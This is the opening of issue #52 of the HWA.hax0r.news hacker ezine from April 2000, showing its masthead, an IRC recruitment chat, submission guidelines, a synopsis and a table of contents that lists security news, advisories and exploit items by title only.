💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn52.… captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 52 Volume 2 Issue 4 1999 Apr 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
*** NEW WEB BOARD NOW ACTIVE ***
http://discserver.snap.com/Indices/103991.html
==========================================================================
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #52 covering Mar 13th to April 9th , 2000
** 564 People are on the email notify list as of this writing.
see note below in the Help Out! section re:distribution.
==========================================================================
_ _ _ ___ _ _
| | | | ___| |_ __ / _ \ _ _| |_| |
| |_| |/ _ \ | '_ \| | | | | | | __| |
| _ | __/ | |_) | |_| | |_| | |_|_|
|_| |_|\___|_| .__/ \___/ \__,_|\__(_)
|_|
WANT TO HELP? like what can I do? some answers to common questions, taken
straight from IRC since, well why re-write it? :)
** Regarding the people on the email notification list with listbot.
We now have a new listserv system setup with help from the generous
people of the CCC (Chaos Computer Club) in Germany. If you haven't
heard of CCC or don't know who they are you've been living under a
rock ;)
I am still working on the system it may or may not be ready for use
as of this release, certainly it should be accessible for the next
one, soon you will be able to receive the newsletter/zine directly
delivered to your inbox (yay!). Stay tuned - Ed
Early one night in #Hwa.hax0r.news ...
<SugarKing> Cruciphux: so do you really need help? cause I can start getting
articles for ya if you want/need them
<Cruciphux> yes
<Cruciphux> damnit
<Cruciphux> I do need help
<SugarKing> so what do I do.....look for articles...copy and paste them.....
then hand them to you?
<Cruciphux> what do you want to do?
<Cruciphux> if you wanna do that sure, email em to me like that
<Cruciphux> must have a source and or url though
<SugarKing> ok
<Cruciphux> ppl always forget urls/sources and I can't print it without a
source
<Cruciphux> if u do and I haven't already put the info in you 'win' a
Contributed by: space sn00zer! line under the article
<Cruciphux> :)
<SugarKing> hehe
<Cruciphux> and if yer good at it and get stuff I've never seen (like isn't
on my excite newsbot list or on HNN etc) then you get
<Cruciphux> promoted to 'staff'
<Cruciphux> etc
<Cruciphux> I should put this in there actually so ppl know what to expect
<SugarKing> ok cool
<Cruciphux> and original articles? i'd kill for good original material
<SugarKing> heh
<Cruciphux> stress on the 'good' but i'm not too picky if someone wants to make
a fool of themselves in public.
<Cruciphux> :-o
<SugarKing> so what kinda of articles.....anything? from programming to
hacking....etc?
<Cruciphux> pretty much
<SugarKing> heh
<Cruciphux> technology, radio, science if it has a techno slant, and of course
internet/web security and hacking related
<Cruciphux> u know the drill
<SugarKing> yeah
<Cruciphux> also
<SugarKing> just checkin...
<SugarKing> heh
<Cruciphux> I need someone to do 'research' on web site defacements
<Cruciphux> an adjunct to what attrition does
<Cruciphux> like tell me about interesting defacements, I just print the sites
list i get from attrition
<SugarKing> like how....person who defaced......??.......??
<SugarKing> ohh ok
<Cruciphux> theres a mailing list you can get on that tells you when sites get
cracked
<Cruciphux> thats a biggie i'm gonna be asking for in this issue
<Cruciphux> print the 'good' defacements (shit with an angle) and track down/
identify defacers and groups
<Cruciphux> etc
<SugarKing> ok cool:)
<Cruciphux> with an eye towards possible profiles (group) and interviews
(if they're doing something interesting)
<Cruciphux> anything else?
<SugarKing> that looks good:)
<SugarKing> it doesn't seem that hard when you hear about people doing it
<Cruciphux> k lemme know if you wanna do anything and lemme know what you want
to do etc
<SugarKing> but now it sure seems harder than expected
<Cruciphux> heh
<SugarKing> but it'll give me something to do at least
<Cruciphux> well I do everything myself right now in free time and there are
areas that i'd like to follow up on nad I just don't have the time
<Cruciphux> so if ppl are willing to help i can keep putting out and hopefully
things will get better too.
<SugarKing> well....I'll do anything you want me to do.....but following up on
defacements and getting articles seems good right now
<Cruciphux> otherwise i'd have to think about either downsizing or closing down
and I don't want to do that really.
<Cruciphux> ok good stuff
<Cruciphux> local and 'small' stuff like whats going on at your schools computer
lab ie: security policies is good angles for writing your own stuff
too if that tickles your fancy
<Cruciphux> doesn't have to be major world news
<Cruciphux> *g*
<SugarKing> ok
*** Quits: narq (I am free of all prejudices. I hate everyone equally)
-=-
And, sending in articles etc...
Instead of emailing me this: (txt formatted to 80 cols)
<->
Patching IE Security, Yet Again
Security vulnerability affects the Win 2000 browser.
Windows 2000 is finally here. And so is a patch for a security vulnerability
in the Internet browser that is bundled with the new operating system.
Microsoft issued the patch on Wednesday, the eve of the release of its
much-delayed operating system.
The bug, which Microsoft calls the Image Source Redirect vulnerability, makes
it possible for a malicious Web site operator to read certain types of files
on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0,
and 5.01.
This means that the iteration of IE that is distributed with Windows 2000,
version 5, also is affected by the bug.
When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser window.
IE then checks the server's permissions on the new page.
The vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in the
server's domain, gaining access to the contents of the user's files in the
process, Microsoft says in a statement.
Any data that can be seen is accessible only for a short period of time, and
the Web site operator would need to know, or guess, the names and locations of
files. The operator would also be able to view only file types that can be
opened in a browser window, including .txt files, Microsoft says.
http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html
<->
::
YOU can go ahead and do some editing yourself and send it like this:
::
<->
Patching IE Security, Yet Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by SugarKing
Security vulnerability affects the Win 2000 browser.
Source: PCworld
url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html
Windows 2000 is finally here. And so is a patch for a security vulnerability
in the Internet browser that is bundled with the new operating system.
Microsoft issued the patch on Wednesday, the eve of the release of its
much-delayed operating system.
The bug, which Microsoft calls the Image Source Redirect vulnerability, makes
it possible for a malicious Web site operator to read certain types of files
on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0,
and 5.01.
This means that the iteration of IE that is distributed with Windows 2000,
version 5, also is affected by the bug.
When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser window.
IE then checks the server's permissions on the new page.
The vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in the
server's domain, gaining access to the contents of the user's files in the
process, Microsoft says in a statement.
Any data that can be seen is accessible only for a short period of time, and
the Web site operator would need to know, or guess, the names and locations of
files. The operator would also be able to view only file types that can be
opened in a browser window, including .txt files, Microsoft says.
@HWA
<->
::
Doesn't seem like much but saves me a bunch of work and I can plug it straight into
the zine text...
-=-
Etc .. any other questions/comments/ideas/etc email me, you know
the addy...
-=-
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #52
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. Clearing up a nasty screw up in issue #51, here's what happened...
04.0 .. HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!...................
05.0 .. WebTV hit by "Melissa-Type" virus.................................
06.0 .. BlaznWeed interview, background info, exploit code and Sect0r.....
07.0 .. plusmail cgi exploit..............................................
08.0 .. 2600 activism against the MPAA....................................
09.0 .. Microsoft sends magazine full versions of Windows 2000............
10.0 .. HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ...........
11.0 .. HNN:Mar 13th:Online Guerrilla War Rages In Brazil ................
12.0 .. HNN:Mar 13th:French Bank Card Algorithm Released .................
13.0 .. HNN:Mar 13th:Still No Suspects in DDoS Attacks ...................
14.0 ,, HNN:Mar 13th:Japanese Pirates Busted .............................
15.0 .. HNN:Mar 13th:Online Handles Impose Fear ..........................
16.0 .. HNN:Mar 13th:Vendors Still Making Insecure Software ..............
17.0 .. HNN:Mar 14th:Smart Card Inventor Issues Challenge ................
18.0 .. HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ........
19.0 .. HNN:Mar 14th:Tracking Down Coolio.................................
20.0 .. HNN:Mar 14th: DOJ Launches Cybercrime Site .......................
21.0 .. HNN:Mar 14th: China Relaxes Crypto Rules .........................
22.0 .. HNN:Mar 14th:Stallman on UCITA ...................................
23.0 .. HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?................
24.0 .. HNN:Mar 15th: UCITA Sign By Governor in Virginia ................
25.0 .. HNN:Mar 15th:RIP Goes Before Commons Today .......................
26.0 .. HNN:Mar 15th:Security Patch Locks Out Users ......................
27.0 .. HNN:Mar 15th:DNA Used for Steganography ..........................
28.0 .. HNN:Mar 15th:Bugging SAT Phones ..................................
29.0 .. HNN:Mar 15th:More and more EZines ................................
30.0 .. HNN:Mar 16th:Army on Alert Over CyberAttack Fear ................
31.0 .. HNN:Mar 16th:NASA Fears CyberAttack From Brazil ..................
32.0 .. HNN:Mar 16th:FBI Site Hit by DOS Again ...........................
33.0 .. HNN:Mar 16th:Teenager Arrested in Online Bank Scam ...............
34.0 .. HNN:Mar 16th:Former Employee Arrested For Attack On Company ......
35.0 .. HNN:Mar 16th:PlayStation2 can Play US DVD ........................
36.0 .. HNN:Mar 16th:ISTF Releases Security Recommendations ..............
37.0 .. HNN:Mar 17th:485,000 Credit Cards #s Stolen, Found on Gov Comp....
38.0 .. HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks .......
39.0 .. HNN:Mar 17th:Secret Service Harassing Bernie S Again .............
40.0 .. HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud.
41.0 .. HNN:Mar 17th:Computer History Lecture Series .....................
42.0 .. HNN:Mar 17th: Australian Police To Increase Online Presence ......
43.0 .. HNN:Mar 17th:Apex DVD Defeats Region and Macrovision .............
44.0 .. HNN:Mar 20th:First Malicious Code Direct at WebTV ................
45.0 .. HNN:Mar 20th:Liberia Claims Attack In CyberWar ...................
46.0 .. HNN:Mar 20th:Judge Bans Anti-Filter Software .....................
47.0 .. HNN:Mar 20th:We Spy To Prevent Bribes ............................
48.0 .. HNN:Mar 20th:LAPD Tells Parody Site To Chill .....................
49.0 .. HNN:Mar 20th:New Windows Worm Virus ..............................
50.0 .. HNN:Mar 20th:GNIT Now Freeware ...................................
51.0 .. HNN:Mar 20th:Online Criminals Labeled Boffins ....................
52.0 .. HNN:Mar 21st: Conflict In Kashmir Continues Online ...............
53.0 .. HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack .........
54.0 .. HNN:Mar 21st:2600 AU to Broadcast DeCSS ..........................
55.0 .. HNN:Mar 21st:CIA Monitoring Upheld by Court ......................
56.0 .. HNN:Mar 21st:Make Your Reservations for RootFest Now! ............
57.0 .. HNN:Mar 22nd:Cybercrime On The Rise ..............................
58.0 .. HNN:Mar 22nd:The Next Version of Windows Leaked ..................
59.0 .. HNN:Mar 22nd:Toronto Business Held For Extortion .................
60.0 .. HNN:Mar 22nd:Is the Census Secure? ...............................
61.0 .. HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web ..........
62.0 .. HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ............
63.0 .. HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ......
64.0 .. HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ...........
65.0 .. HNN:Mar 23rd:Business May Be Protected Against FOIA ..............
66.0 .. HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ............
67.0 .. HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set ....
68.0 .. HNN:Mar 24th:Max Vision Indicted in San Jose .....................
68.1 .. KYZSPAM: More on Max Vision bust..................................
69.0 .. HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ...........
70.0 .. HNN:Mar 24th:Rack Mount Your iMac ................................
71.0 .. HNS:Mar 24th:SECRETS STOLEN.......................................
72.0 .. HNS:Mar 24th:PATCH RELEASED BY TREND MICRO........................
73.0 .. HNS:Mar 24th:PRIVACY ISSUES.......................................
74.0 .. HNS:Mar 24th:TARGETING ONLINE SCAMMERS............................
75.0 .. HNS:Mar 24th:FEARS OF FREENET.....................................
75.1 ...(More) Anonymous net access aiding and abetting online criminals?.
76.0 .. HNS:Mar 24th:FEDERAL CIO NEEDED...................................
77.0 .. HNS:Mar 24th:DETERRENT SENTENCES..................................
78.0 .. HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC...........................
79.0 .. HNS:Mar 23rd:ALTERING WEB SITES...................................
80.0 .. HNS:Mar 23rd:SECURITY BREACHES....................................
81.0 .. HNS:Mar 23rd:ATTACK COSTS RISE....................................
82.0 .. HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS....................
83.0 .. HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY....................
84.0 .. HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT...........................
85.0 .. HNS:Mar 23rd:"ANTI-ARAB" BUG......................................
86.0 .. HNS:Mar 23rd:OFFICE 2000 PATCHES..................................
87.0 .. HNS:Mar 23rd:SHARING INFORMATION..................................
88.0 .. HNS:Mar 23rd:MONITORING WITH GOOD RESULTS.........................
89.0 .. HNS:Mar 23rd:CRIME FIGHTING LAB...................................
90.0 .. HNS:Mar 23rd:HUNTING CROATIAN PIRATES.............................
91.0 .. HNS:Patch available for OfficeScan vulnerability..................
92.0 .. HNS:Gpm-root problems.............................................
93.0 .. HNS:Esafe Protect Gateway (CVP) problems..........................
94.0 .. HNS:Bug in Apache project: Jakarta Tomcat.........................
95.0 .. HNS:MS SECURITY BULLETIN #18......................................
96.0 .. HNS:S.A.F.E.R. Security Bulletin 000317...........................
97.0 .. HNS:Decon fix for con/con is vulnerable...........................
98.0 .. HNS:Cerberus Information Security Advisory........................
99.0 .. HNS:Malicious-HTML vulnerabilities at deja.com....................
100.0 .. HNS:Certificate Validation Error in Netscape Browsers.............
101.0 .. HNS:"OfficeScan DoS & Message Replay" Vulnerability...............
102.0 .. HNS:MS Security bulletin#17.......................................
103.0 .. HNS:Georgi Guninski security advisory #9..........................
103.1 .. PSS:More MSIE crashing info by NtWakO.............................
104.0 .. HNS:Drive Mappings in Interactive Login...........................
105.0 .. HNS:DoS Attack in MERCUR WebView .................................
106.0 .. HNS:Problem with Firewall-1.......................................
107.0 .. HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b.................
108.0 .. HNS:Extending the FTP "ALG" vulnerability ........................
109.0 .. FreeBSD-SA-00:08: Lynx overflows..................................
110.0 .. Curador? BUSTED...................................................
111.0 .. PSS: Shaft Distributed DoS tool analysis Sven Dietrich............
111.1 .. PSS: Shaft Node/Master analysis by Rick Wash & Jose Nazario.......
112.0 .. Wrapster, the Napster hack fires up the trading fires.............
113.0 .. AceFTP vulnerabilty by Armour.....................................
114.0 .. Pursuit Zine #1 (Aug 99)..........................................
115.0 .. SecurityFocus.com Newsletter 33...................................
116.0 .. You can get into trouble for hacking!.............................
117.0 .. SSHD v2.0.11< (old) Watch your version numbers!...................
118.0 .. BBC:"Outdoing the hackers"........................................
119.0 .. HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more).
120.0 .. HNN:Mar 27th:Inferno Busted in Brazil ............................
121.0 .. HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth ..........
122.0 .. HNN:Mar 27th:PalmPilot WarDialer Released ........................
123.0 .. HNN:Mar 27th:Mi5 Computer Stolen .................................
124.0 .. HNN:Mar 27th:"HNN Wins Bad Ass Media Award".......................
125.0 .. HNN:Mar 28th:French Ban Anonymous Internet........................
126.0 .. HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ........
127.0 .. HNN:Mar 28th:2600 Under Fire From NBC ............................
128.0 .. HNN:Mar 28th:Takedown Debuts in France ...........................
129.0 .. HNN:Mar 28th:Mattel Buys Rights to CPHack ........................
130.0 .. HNN:Mar 28th:Cyber Security Bill Passes Committee ................
131.0 .. HNN:Mar 28th:Census Gets NSA to Look at Security .................
132.0 .. HNN:Mar 28th:Icomlib 1.0.0 Final Released ........................
133.0 .. HNN:Mar 28th:China Bans MP3s .....................................
134.0 .. HNN:Mar 29th:MostHated to Plead Guilty ...........................
135.0 .. HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ........
136.0 .. HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits .......
137.0 .. HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag........
138.0 .. HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes....
139.0 .. HNN:Mar 29th:Another DVD Work Around on PlayStation 2.............
140.0 .. HNN:Mar 29th:Interview with Attrition Staff Posted................
141.0 .. HNN:Mar 29th:The Unfairness of Computer Crime Sentences...........
142.0 .. HNN:Mar 29th:@tlanta Con to be Held this Weekend..................
143.0 .. HNN:Mar 30th:MostHateD Busted for Burglary and Theft..............
144.0 .. HNN:Mar 30th:Miramax Sued for Fugitive Game.......................
145.0 .. HNN:Mar 30th:Glassbook Shattered..................................
146.0 .. HNN:Mar 30th:Yahoo Sued Over Piracy...............................
147.0 .. HNN:Mar 30th:Italian University Attacked by Brazilian Intruders...
148.0 .. HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions..........
149.0 .. HNN:Mar 30th:Australia To Protect Privacy of Works................
150.0 .. HNN:Mar 31st:Y2Hack Goes on in Israel.............................
151.0 .. HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil....
152.0 .. HNN:Mar 31st:China Sets Up security Test Center...................
153.0 .. HNN:Mar 31st:Hackers Probe Physical Security of MIT...............
154.0 .. HNN:Mar 31st:DVD for Linux is Now Legal...........................
155.0 .. HNN:Mar 31st:Y2K Survivalists Come Out of Hiding..................
156.0 .. CoreZine: New zine by lamagra of b0f..............................
157.0 .. Paper:Some Extra Security In The Linux Kernel - Auditfile by {}...
158.0 .. Lets hack an NT box...how they are being defaced & how to secure..
159.0 .. Hijack any .nu domain box (DoS/redirection/hijack)................
160.0 .. The dreaded and most pheared return of the infamous GOAT!.........
161.0 .. b0f: exploit code to hang any linux machine by eth0...............
162.0 .. HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script..
163.0 .. HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" ..............
164.0 .. HNN:Apr 3rd:Forget Cookies, Worry About Cache ....................
165.0 .. HNN:Apr 3rd:Identity Theft On the Rise ...........................
166.0 .. HNN:Apr 3rd:Computer Crime Laws ..................................
167.0 .. HNN:Apr 4th:Computers Turned Into Bombs Via The Net...............
168.0 .. HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book........
169.0 .. HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP..........
170.0 .. HNN:Apr 4th:Federal Web Site Security Called Weak (Again).........
171.0 .. HNN:Apr 4th:Germans Propose Strike Force For Net Defense..........
172.0 .. HNN:Apr 4th:New Mags are Now Available............................
173.0 .. HNN:Apr 5th:De Beers Releases Personal Info.......................
174.0 .. HNN:Apr 5th:CFP In Toronto........................................
175.0 .. HNN:Apr 5th:Enigma Machine Stolen From Museum.....................
176.0 .. HNN:Apr 5th:Thailand Police Form Cyber Crime Panel................
177.0 .. HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked..............
178.0 .. HNN:Apr 6th:DoubleClick Wins Privacy Award........................
179.0 .. HNN:Apr 6th:ACLU Appeals CPHack Ruling............................
180.0 .. HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking...........
181.0 .. HNN:Apr 6th:Enigma Suspect Busted.................................
182.0 .. HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate........
183.0 .. HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses.......
184.0 .. HNN:Apr 6th:History of the L0pht, Part 1..........................
185.0 .. HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech...
186.0 .. HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors.......
187.0 .. HNN:Apr 7th:Links to Web Sites Illegal............................
188.0 .. HNN:Apr 7th:British Companies Complacent..........................
189.0 .. HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong
190.0 .. HNN:Apr 7th:Census Afraid of Electronic Intrusion.................
191.0 .. HNN:Apr 7th:Hardware Key Logger Introduced........................
192.0 .. HNN:Apr 7th:Napalm Issue 4........................................
193.0 .. HNS:Apr 8th:NEW KIND OF SECURITY SCANNER..........................
194.0 .. HNS:Apr 8th:WAYS TO ATTACK........................................
195.0 .. HNS:Apr 7th:STOLEN ACCOUNTS.......................................
196.0 .. HNS:Apr 7th:JAILED FOR SIX MONTHS.................................
197.0 .. HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION...................
198.0 .. HNS:Apr 7th:NET PRIVACY TOOLS.....................................
199.0 .. HNS:Apr 7th:SECURITY ADDITIONS....................................
200.0 .. HNS:Apr 7th:COOKIES...............................................
201.0 .. HNS:Apr 7th:SECURE E-MAIL SERVICE.................................
202.0 .. HNS:Apr 7th:ONLINE MUGGERS........................................
203.0 .. HNS:Apr 6th:SURVEY BY DTI.........................................
204.0 .. HNS:Apr 6th:COMPUTER CODES PROTECTED..............................
205.0 .. HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT.....................
206.0 .. HNS:Apr 6th:CYBERPATROL BLOCK LIST................................
207.0 .. HNS:Apr 5th:CRYPTO REGULATIONS....................................
208.0 .. HNS:Apr 5th:GFI AND NORMAN TEAM UP................................
209.0 .. HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE.................
210.0 .. HNS:Apr 5th:BUFFER OVERFLOWS......................................
211.0 .. HNS:Apr 5th:PIRACY................................................
212.0 .. HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER..................
213.0 .. HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION...................
214.0 .. HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY.................
215.0 .. HNS:Apr 4th:FIGHT SPAM WITH SPAM..................................
216.0 .. HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW............................
217.0 .. ISN:Mar 18th:Serbs hacked Britain's top-secret military computers.
218.0 .. March 15th: CRYPTOGRAM newsletter.................................
219.0 .. ISN:Mar 18th:Microsoft fends off hackers with Windows 2000........
220.0 .. ISN:Feds Behind Recent Massive Web Hacking/Fwd....................
221.0 .. ISN:Hacker 'Gatsby' Gets 18-Month Sentence........................
222.0 .. ISN:Naval officer in hot water over policy........................
223.0 .. ISN:Police to step up fight against e-crime.......................
224.0 .. ISN:Developers blasted on security................................
225.0 .. ISN:"Islands in the clickstream, in defense of hacking"...........
226.0 .. ISN:Man angry at employer swallows own head.......................
227.0 .. ISN:Nasa division battles the hack from ipanema...................
228.0 .. ISN:Toys'R'Us.....................................................
229.0 .. ISN:Computer expert accused of hacking............................
230.0 .. ISN:Disney and Miramax Sued for 'Hacking'.........................
231.0 .. ISN:Hacker posts own version of Gore's speech online..............
232.0 .. ISN:Bennett leads cyber defense...................................
233.0 .. ISN:Hackers rue blurred line between curiosity, vandalism.........
234.0 .. ISN:Curador worked as e-commerce consultant.......................
235.0 .. ISN:White house official charged with spreading phone codes.......
236.0 .. ISN:Hackers hold conference in Israel.............................
237.0 .. ISN:Old school MIT stylie "hacking" still makes news?.............
238.0 .. ISN:US Census tests security......................................
239.0 .. ISN:Visa program targets online fraud.............................
240.0 .. ISN:GAO lists security bargains...................................
241.0 .. ISN:DeBeers leaks customer info...................................
242.0 .. ISN:Cybersleuths want to hack bill of rights......................
243.0 .. ISN:Third laptop gets lifted......................................
244.0 .. ISN:Government suck rocks at busting computer criminals...........
245.0 .. CanSecWest/core00 Canadian Security Conf..........................
246.0 .. PSS: BeOs Network DoS.............................................
247.0 .. PSS: TESO Security Advisory BinTec router weakness................
248.0 .. b0f: namedscan.c..................................................
249.0 .. PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0............
250.0 .. PSS: CGI rmp_query scanner........................................
251.0 .. PSS: New ircii exploit............................................
252.0 .. PSS:Cerberus Information Security Advisory (CISADV000330).........
253.0 .. PSS:Win32 Realplayer 6/7 Buffer Overflow..........................
254.0 .. ISS Security summary data sheet...................................
255.0 .. PSS: suse kreatecd root compromise................................
256.0 .. PSS: irix object server remote root exploit.......................
257.0 .. PSS: Sun bind advisory............................................
258.0 .. Cyberprofiling....................................................
259.0 .. mIRC 5.7 Exploit code.............................................
260.0 .. Spaghetti proxy server exploit code...............................
261.0 .. schoolbus.c - netbus 1.7 client exploit crashes script kids box...
262.0 .. Protocol reverse engineering using Sub7 as an example.............
263.0 .. Essay:Elf Orin: The meaning of being a hacker.....................
264.0 .. Linux 2.2.x masq tunnel/hijack scenerio...........................
265.0 .. AWARD Bios password cracker .c source code........................
266.0 .. Locked out? default BIOS/CMOS password list.......................
=-------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.
Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 ,, Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................
